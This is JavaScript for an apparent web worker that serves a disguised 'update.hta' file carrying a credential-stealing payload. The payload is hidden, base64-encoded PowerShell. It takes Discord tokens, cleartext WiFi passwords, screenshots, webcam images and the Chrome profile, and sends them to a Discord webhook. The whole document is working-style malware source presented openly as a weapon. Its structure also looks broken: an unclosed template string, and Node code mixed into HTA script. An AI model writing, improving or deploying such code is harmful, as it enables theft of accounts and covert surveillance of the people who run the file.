// This worker intercepts all requests to your domain.
export default {
  async fetch(request, env, ctx) {
    // The HTA payload, stored as a multi-line string.
    // This is the weapon.
    const htaPayload = `
<meta http-equiv="x-ua-compatible" content="ie=edge">
<hta:application id="omega" applicationname="IndexerService" border="none" caption="no" contextmenu="no" maximizebutton="no" minimizebutton="no" scroll="no" showintaskbar="no" singleinstance="yes" sysmenu="no" windowstate="minimize">
<script language="JScript">
(function(){
    try {
        var shell = new ActiveXObject("WScript.Shell");
        var fso = new ActiveXObject("Scripting.FileSystemObject");
        var env = shell.ExpandEnvironmentStrings;
        var webhook = "YOUR_DISCORD_WEBHOOK_URL_GOES_HERE";
        var tempPath = env("%TEMP%");
        
        // --- Core Payload ---
        var psScript =
        "Add-Type -AssemblyName System.Drawing, System.Windows.Forms, Microsoft.VisualBasic;" +
        "$ErrorActionPreference = 'SilentlyContinue';" +
        "$Webhook = '" + webhook + "';" +
        "$BotName = 'Omega Strain';" +
        "$BotAvatar = 'https://i.imgur.com/g63Mu0x.png';" +
        // Function to send embeds
        "function Send-Embed { param($Embed) $Payload = @{ username = $BotName; avatar_url = $BotAvatar; embeds = @($Embed) } | ConvertTo-Json -Depth 10; Invoke-RestMethod -Uri $Webhook -Method Post -ContentType 'application/json' -Body $Payload -UseBasicParsing; };" +
        // Sys Info
        "$ipInfo = Invoke-RestMethod -Uri 'http://ip-api.com/json/'; " +
        "$cpu = (Get-WmiObject -Class Win32_Processor).Name; $gpu = (Get-WmiObject -Class Win32_VideoController).Name; $ram = \\\"$([Math]::Round((Get-WmiObject Win32_ComputerSystem).TotalPhysicalMemory / 1GB)) GB\\\";" +
        "$mainEmbed = @{ title = ('💀 Omega Infection: ' + $env:USERNAME + '@' + $env:COMPUTERNAME); color = 16711680; description = ('**[Map Link](https://www.google.com/maps/search/?api=1&query=' + $ipInfo.lat + ',' + $ipInfo.lon + ')**'); fields = @(@{ name = 'IP / ISP'; value = ('```' + $ipInfo.query + ' / ' + $ipInfo.isp + '```'); inline = $false }, @{ name = 'Location'; value = ('```' + $ipInfo.city + ', ' + $ipInfo.regionName + ', ' + $ipInfo.country + '```'); inline = $false }, @{ name = 'System'; value = ('```OS: ' + (Get-WmiObject -Class Win32_OperatingSystem).Caption + '\\nCPU: ' + $cpu + '\\nGPU: ' + $gpu + '\\nRAM: ' + $ram + '```'); inline = $false }); };" +
        "Send-Embed -Embed $mainEmbed;" +
        // Discord Tokens
        "$tokens = ''; $paths = @($env:APPDATA + '\\discord\\Local Storage\\leveldb', $env:APPDATA + '\\discordcanary\\Local Storage\\leveldb', $env:LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb'); foreach($path in $paths){ if(Test-Path $path){ Get-ChildItem -Path $path -Filter '*.ldb' | ForEach-Object { $tokens += (Select-String -Path $_.FullName -Pattern '([a-zA-Z0-9_]{24}\\.[a-zA-Z0-9_]{6}\\.[a-zA-Z0-9_]{27}|mfa\\.[a-zA-Z0-9_-]{84})').Matches.Value + '\\n' } } };" +
        // WiFi
        "$wifi = ''; ((netsh wlan show profiles) | Select-String 'All User Profile' | %{$_.ToString().Split(':')[1].Trim()}) | %{$ssid=$_; $pass=((netsh wlan show profile name=\\\"$ssid\\\" key=clear) | Select-String 'Key Content').ToString().Split(':')[1].Trim(); if($pass){ $wifi += ('SSID: ' + $ssid + '\\nPass: ' + $pass + '\\n\\n') } };" +
        // Credentials Embed
        "$credsEmbed = @{ title = '🔑 Credentials & Networks'; color = 16776960; description = ('**Discord Tokens:**\\n```' + $tokens + '```\\n**WiFi Passwords:**\\n```' + $wifi + '```') };" +
        "Send-Embed -Embed $credsEmbed;" +
        // Screenshot & Webcam
        "$ssPath = $env:TEMP + '\\ss.jpg'; [System.Windows.Forms.Screen]::AllScreens | %{ $bmp = New-Object System.Drawing.Bitmap $_.Bounds.Width, $_.Bounds.Height; $gfx = [System.Drawing.Graphics]::FromImage($bmp); $gfx.CopyFromScreen($_.Bounds.Location, [System.Drawing.Point]::Empty, $bmp.Size); $bmp.Save($ssPath, 'Jpeg') };" +
        "$camPath = $env:TEMP + '\\cam.jpg'; try{ $c = New-Object Microsoft.VisualBasic.Devices.Computer; $c.Camera.CaptureImage($camPath) }catch{};" +
        // File Uploads
        "if(Test-Path $ssPath){ try{ Invoke-RestMethod -Uri $Webhook -Method Post -InFile $ssPath }catch{}; Remove-Item $ssPath -Force; };" +
        "if(Test-Path $camPath){ try{ Invoke-RestMethod -Uri $Webhook -Method Post -InFile $camPath }catch{}; Remove-Item $camPath -Force; };" +
        // Browser Data - Grab the files for offline analysis
        "$zipPath = $env:TEMP + '\\browser_data.zip'; $chromePath = $env:LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Default'; if(Test-Path $chromePath){ Add-Type -AssemblyName System.IO.Compression.FileSystem; try{[System.IO.Compression.ZipFile]::CreateFromDirectory($chromePath, $zipPath, 'Optimal', $false)}catch{} };" +
        "if(Test-Path $zipPath){ try{ Invoke-RestMethod -Uri $Webhook -Method Post -InFile $zipPath }catch{}; Remove-Item $zipPath -Force; }";

        // Base64 encode the monster script.
        var b64Script = Buffer.from(psScript).toString('base64');
        var command = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand " + b64Script;
        
        // The minimal JScript launcher.
        var jscript = "try{ new ActiveXObject('WScript.Shell').Run('" + command.replace(/'/g, "\\'") + "', 0, false); }catch(e){} window.close();";
        
        var finalHta = htaPayload.replace('</script>', jscript + '</script>');

        // Create the response with the magic header.
        return new Response(finalHta, {
            headers: {
                'Content-Type': 'application/hta',
                'Content-Disposition': 'attachment; filename="update.hta"' // Suggests a filename
            },
        });
    },
};
